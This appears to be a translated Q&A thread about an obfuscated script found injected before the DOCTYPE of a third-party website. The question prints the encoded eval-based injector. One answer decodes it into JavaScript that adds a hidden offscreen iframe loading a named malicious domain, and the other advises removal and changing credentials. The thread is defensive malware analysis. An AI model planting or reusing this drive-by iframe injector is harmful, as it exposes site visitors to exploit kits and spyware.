1

在一个特定的网站(不是我的)上,我被告知它想要使用 Java,并且我看到印度的一个域被引用。由于这对我来说看起来不正常,我查看了页面源代码。在 DOCTYPE 之前有一个大的脚本块。我只在 IE10(不是 FF 等)和多台机器上看到这一点。我不够聪明,无法确切地看到发生了什么,因为它看起来被掩盖了很多。在我向网站所有者报告情况之前(出于我自己的好奇心),我想知道这是否绝对是黑客攻击的证据。当我从下面搜索短语“asd=function”时,我看到其他一些网站的代码非常相似,因此这可能是一个常见问题。(或者也许它对 IE10 来说是合法的??)下面是添加了额外换行符的代码。

<script>
ps="split";
asd=function(){d.body++};
a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));
ss=String;
d=document;
for(i=0;i<a.length;i+=1){
 a[i]=-(7-3)+parseInt(a[i],8);}
try{asd()}
catch(q){
zz=0;}
try{zz/=2}
catch(q){zz=1;}
if(!zz)eval(ss.fromCharCode.apply(ss,a));
</script>

如果这真的是恶意的,是否有我可以/应该将其发布到的取证网站?

4

2 回答 2

4

这是上述代码的“翻译”:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/');
    f.style.left='-10000px';
    f.style.top='0';
    f.style.position='absolute';
    f.style.top='0';
    f.setAttribute('width','100');
    f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}

它不仅编码不佳(有人显然从未听说过该document.body属性......),而且很明显是一种黑客行为。

有趣的是,如果我不包含 IE10 User-Agent 字符串,则请求资源会返回 402 Payment Required 标头 - 这可能暗示它旨在利用该特定浏览器。欺骗有效的 UA 字符串会给我一个页面,其中包含一堆我懒得解码的过于复杂的 JavaScript,但这看起来肯定不友好。

于 2013-06-05T01:09:11.653 回答
1

删除它,它正在尝试加载一个很可能会在您的计算机上安装间谍软件的 url。

该网站如下:

http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/

该网站已被停用,所以是的.. 您的网站已被黑客入侵。

更改您的 FTP/SSH 密码,清除所有有权访问主机帐户的计算机。

于 2013-06-05T01:09:21.400 回答